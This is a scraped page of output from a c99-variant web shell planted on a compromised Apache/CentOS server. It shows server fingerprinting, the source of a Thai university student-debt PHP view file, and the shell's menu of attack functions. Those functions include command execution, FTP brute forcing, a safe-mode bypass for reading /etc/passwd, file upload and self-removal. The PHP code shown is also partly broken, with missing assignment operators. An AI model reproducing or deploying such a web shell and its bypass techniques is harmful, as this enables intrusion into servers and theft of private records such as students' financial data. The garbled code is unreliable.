!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis-13022565/   drwxrwxrwx
Free 48.44 GB of 127.8 GB (37.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addDebt.php (11.31 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script type="text/javascript" src="<?php echo base_url();?>js/karn_module.js"></script>
<?php
    $row_prsDebtUD = (isset($qu_prsDebtUDAuthority) && $qu_prsDebtUDAuthority!=NULL) ? $qu_prsDebtUDAuthority->row() : NULL;
    
if($qu_prsDebtUDAuthority->num_rows()>0){
    $prsDebtUDAuthority $row_prsDebtUD->prsDebtUDAuthority;
    if($qu_std->num_rows()>0){
        $row_std = (isset($qu_std) && $qu_std!=NULL) ? $qu_std->row() : NULL;
        $row_cur = (isset($qu_cur) && $qu_cur!=NULL) ? $qu_cur->row() : NULL;
        $row_sy = (isset($qu_sy) && $qu_sy!=NULL) ? $qu_sy->row() : NULL;
        $row_lv = (isset($qu_lv) && $qu_lv!=NULL) ? $qu_lv->row() : NULL;
        $row_org = (isset($qu_org) && $qu_org!=NULL) ? $qu_org->row() : NULL;
    }
}else{
    $prsDebtUDAuthority NULL;
}
?>
<script>
function checkPerson(db,ses){
    if(!/^[ก-๙][ก-๙ 0-9\.\(\)\/\- ]*$/.test($('#dbtDescription').val())){
        $('#dbtDescription').focus();
        alert('กรุณาป้อนและควรป้อนเป็นภาษาไทยเท่านั้น');
        return false;
    }
    if(!/^[0-9][0-9]*$/.test($('#dbtAmt').val())){
        $('#dbtAmt').focus();
        alert('กรุณาป้อนและควรป้อนเป็นตัวเลขเท่านั้น');
        return false;
    }        
    if(db!=ses){
        sendPost('person',{'db':db,'ses':ses,'prsItId':'<?=$row_prsDebtUD->prsItId;?>','prsOrgId':'<?=$row_prsDebtUD->prsOrgId;?>'},'<?echo site_url($this->config->item("rg_folder")."finance/adminPass");?>',{});
    }else{
        return true;
    }
    return false;
}

function forDel(dbtSeq,stdId,acY,tmId,stdCode,dbtDescription,dbtAmt,orgId,db,ses){
    if(db!=ses){
        sendPost('delPrs',{'method':'del','db':db,'ses':ses,'prsItId':'<?=$row_prsDebtUD->prsItId;?>','prsOrgId':'<?=$row_prsDebtUD->prsOrgId;?>','dbtSeq':dbtSeq,'stdId':stdId,'acY':acY,'tmId':tmId,'stdCode':stdCode,'dbtDescription':dbtDescription,'dbtAmt':dbtAmt,'orgId':orgId},'<?echo site_url($this->config->item("rg_folder")."finance/adminPass");?>',{});
    }else{
        if(confirm("คุณต้องการลบ ใช่หรือไม่!!")){
            sendPost('hidform3',{'method':'del','dbtSeq':dbtSeq,'stdId':stdId,'acY':acY,'tmId':tmId,'stdCode':stdCode,'dbtDescription':dbtDescription,'dbtAmt':dbtAmt,'orgId':orgId},'<?echo site_url($this->config->item("rg_folder")."finance/debt_insert_update");?>');
        }
    }
}

function del(dbtSeq,stdId,acY,tmId,stdCode,dbtDescription,dbtAmt,orgId,db,ses){
    sendPost('hidform2',{'method':'del','dbtSeq':dbtSeq,'stdId':stdId,'acY':acY,'tmId':tmId,'stdCode':stdCode,'dbtDescription':dbtDescription,'dbtAmt':dbtAmt,'orgId':orgId},'<?echo site_url($this->config->item("rg_folder")."finance/debt_insert_update");?>')
}

</script>
            <label><div align="center"><br><?php echo form_open($this->config->item("rg_folder")."finance/debt_insert_update", array("name" => "pc""id" => "pc"));?><table width="80%" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $table_color_even;?>">
                <tr>
                    <td align="center"><span class="h error">บันทึก</span></td>
                </tr>
                <tr>
                    <td>&nbsp;</td>
                </tr>
<?php
                if($prsDebtUDAuthority== NULL or is_null($row_prsDebtUD->prsOrgId)) {
?>
                <tr>
                    <td align="center" height="22"><span class="error">** กรุณาตรวจสอบหน่วยแจ้งหนี้นักศึกษาให้ถูกต้อง
                    <a href="searchDebt">คลิกที่นี่ย้อนกลับ</a> **</span></td>
                </tr>
<?php
                    //exit;
                }else if($qu_std->num_rows()<=0) {
?>
                <tr>
                    <td align="center" height="22"><span class="error">** กรุณาตรวจสอบเงื่อนไขให้ถูกต้อง
                    <a href="searchDebt">คลิกที่นี่ย้อนกลับ</a> **</span></td>
                </tr>
<?php                            
                }else {    
?>                        
                <tr>
                    <td align="center"><table class="szone">                                                                                                                            
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รหัสนักศึกษา</td>
                            <td> <?php echo setValue('stdCode',$row_std);?></font>
                            <input type="hidden" name="stdCode" value="<?php echo setValue('stdCode',$row_std);?>">
                            <input type="hidden" name="stdId" value="<?php echo setValue('stdId',$row_std);?>"></td>
                            <td class="coltd_szone">ชื่อ-นามสกุล</td>
                            <td> <?php echo setValue('prefixName',$row_std).setValue('stdName',$row_std).' '.setValue('stdSurname',$row_std);?></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">หลักสูตร</td>
                            <td colspan="3"> <?php echo setValue('curName',$row_cur);?></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ชั้นปี</td>
                            <td> <?php echo setValue('syCode',$row_sy);?></td>                                
                            <td class="coltd_szone">ระดับการศึกษา</td>
                            <td><?php echo setValue('levelName',$row_lv);?></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ปีการศึกษาที่เป็นหนี้</td>
                            <td><?php echo $acY;?>
                            <input type="hidden" name="acY" value="<?php echo $acY;?>"></td>
                            <td class="coltd_szone">ภาคการศึกษาที่เป็นหนี้</td>
                            <td><?php echo $tmId;?>
                            <input type="hidden" name="tmId" value="<?php echo $tmId;?>"></td>                                    
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">หน่วยแจ้งหนี้นักศึกษา</td>
                            <td colspan="3"> <?php echo setValue('orgName',$row_org);?>
                            <input type="hidden" name="orgId" value="<?php echo setValue('orgId',$row_org);?>"></td>
                        </tr>                                                                                                                                                                                                
                    </table></td>
                </tr>
                <tr>
                    <td>&nbsp;</td>
                </tr>
                <tr>
                    <td align="center"><table class="headCol">
                        <tr>
                            <th class="seqCol">ลำดับที่</th>
                            <th>รายการ</th>
                            <th class="domAmtCol">จำนวนเงิน</th>
                            <th class="editCol">แก้ไข</th>
                            <th class="deleteCol">ลบ</th>
                        </tr>
<?php
                        $tmp "";
                        $i 0;
                        $total 0;
                        foreach($rs_debt->result() as $row_debt) {
                            $total $total+$row_debt->dbtAmt;
                            echo "<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                            <td align="center"><?php echo $i+1;?>
<?php
                            if($method=='editOrder' && $row_debt->dbtSeq==$dbtSeq && $row_debt->dbtStdId==$row_std->stdId && $row_debt->dbtAcY==$acY && $row_debt->dbtTmId==$tmId) {
                            $tmp $row_debt->dbtCreateUserId;
?>
                            <input type="hidden" name="dbtSeq" value="<?php echo $row_debt->dbtSeq;?>">
<?php
                            }
?>
                            </td>
                            <td class="indent">
<?php
                            if($method=='editOrder' && $row_debt->dbtSeq==$dbtSeq && $row_debt->dbtStdId==$row_std->stdId && $row_debt->dbtAcY==$acY && $row_debt->dbtTmId==$tmId) {
?>
                            <input type="text" name="dbtDescription" id="dbtDescription" size="30" value="<?php echo $row_debt->dbtDescription;?>">
<?php                                            
                            }
                            else{
                                echo $row_debt->dbtDescription;    
                            }
?>
                            </td>
                            <td align="right">
<?php
                            if($method=='editOrder' && $row_debt->dbtSeq==$dbtSeq && $row_debt->dbtStdId==$row_std->stdId && $row_debt->dbtAcY==$acY && $row_debt->dbtTmId==$tmId) {
?>
                            <input type="text" name="dbtAmt" id="dbtAmt" size="4" value="<?php echo $row_debt->dbtAmt;?>" class="right">
<?php
                            }
                            else{
                                echo number_format($row_debt->dbtAmt2);
                            }
?>
                            </td>
                            <td align="center">
<?php
                            if($method=='editOrder' && $row_debt->dbtSeq==$dbtSeq && $row_debt->dbtStdId==$row_std->stdId && $row_debt->dbtAcY==$acY && $row_debt->dbtTmId==$tmId) {
                                echo '-';
                            }else {
?>                                
                            <span class="hand" onClick="sendPost('hidform',<? echo "{'method':'editOrder','dbtSeq':'".$row_debt->dbtSeq."','stdId':'".$row_debt->dbtStdId."','acY':'".$row_debt->dbtAcY."','tmId':'".$row_debt->dbtTmId."','stdCode':'".setValue('stdCode',$row_std)."'}";?>,'<?echo site_url($this->config->item("rg_folder")."finance/addDebt");?>')"><img <?echo "src=\"".base_url().$this->config->item("rg_edit")."\"";?> align="absmiddle" border="0"></span>
<?php
                            }
?>
                                                                                                                                                            
                            </td>
                            <td align="center"><span class="hand" onClick="forDel(<?echo "'".$row_debt->dbtSeq."','".$row_debt->dbtStdId."','".$row_debt->dbtAcY."','".$row_debt->dbtTmId."','".setValue('stdCode',$row_std)."','".$row_debt->dbtDescription."','".$row_debt->dbtAmt."','".setValue('orgId',$row_org)."','".$row_debt->dbtCreateUserId."','".$this->session->userdata('UsLogin')."'";?>)"><img <?echo "src=\"".base_url().$this->config->item("rg_delete")."\"";?> align="absmiddle" border="0"></span></td>
                        </tr>
<?php
                            $i++;
                        }
                        
                        if($i == 0) {
?>
                        <tr>
                            <td align="center" colspan="5" height="22"><span class="error">** ไม่ปรากฏรายการหนี้สินในฐานข้อมูล **</span></td>
                        </tr>
<?php                                
                        }
                        
                        if($method == 'addOrder') {
?>                                    
                        <tr>                                                          
                            <td align="center"><?php  echo $i+1;?></td>
                            <td><input type="text" name="dbtDescription" id="dbtDescription" size="30"></td>
                            <td align="right"><input type="text" name="dbtAmt" id="dbtAmt" size="4"></td>
                            <td align="center">-</td>
                            <td align="center">-</td>
                        </tr>
<?php
                        }
?>
                        <tr bgcolor="<?php echo $table_color_even;?>">                                                          
                            <td align="right" colspan="2"><b>รวมเงินทั้งสิ้น</b></td>
                            <td align="right"><?php echo number_format($total2);?></td>
                            <td colspan="3">&nbsp;</td>
                        </tr>
                        <tr>                                                          
                            <td colspan="3">
<?php
                            if($method!='addOrder' && $method!='editOrder') {
?>                                        
                            <input type="hidden" name="method" value="addOrder">
                            <input type="submit" name="addOrder" value="เพิ่มรายการ" onClick="document.pc.action = 'addDebt'">
                            <input type="button" name="back" value="ย้อนกลับ" onClick="location.href = 'searchDebt'">
<?php
                            }
                            else if($method=='addOrder' && $method!='editOrder') {

?>                                        
                            <input type="hidden" name="method" value="add">
                            <input type="submit" name="add" value="บันทึก" onClick="return checkFormat()">
                            <input type="reset" name="clear" value="เคลียร์ข้อมูล">
                            <input type="submit" name="cancel" value="ยกเลิก" onClick="document.pc.action = 'addDebt'">
<?php
                            }
                            else if($method!='addOrder' && $method=='editOrder') {
?>
                            <input type="hidden" name="method" value="edit">
                            <input type="submit" name="edit" value="แก้ไข" onClick="return checkPerson(<? echo "'".$tmp."','".$this->session->userdata('UsLogin')."'";?>)">
                            <input type="reset" name="clear" value="เคลียร์ข้อมูล">
                            <input type="submit" name="cancel" value="ยกเลิก" onClick="document.pc.action = 'addDebt'">
<?php
                            }
?>
                            </td>
                            <td align="right" colspan="2">รวม <?php echo $i;?> รายการ</td>
                        </tr>                                    
                    </table></td>
                </tr>
<?php
                }
?>                                                
            </table></form></div></label>
        

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0119 ]--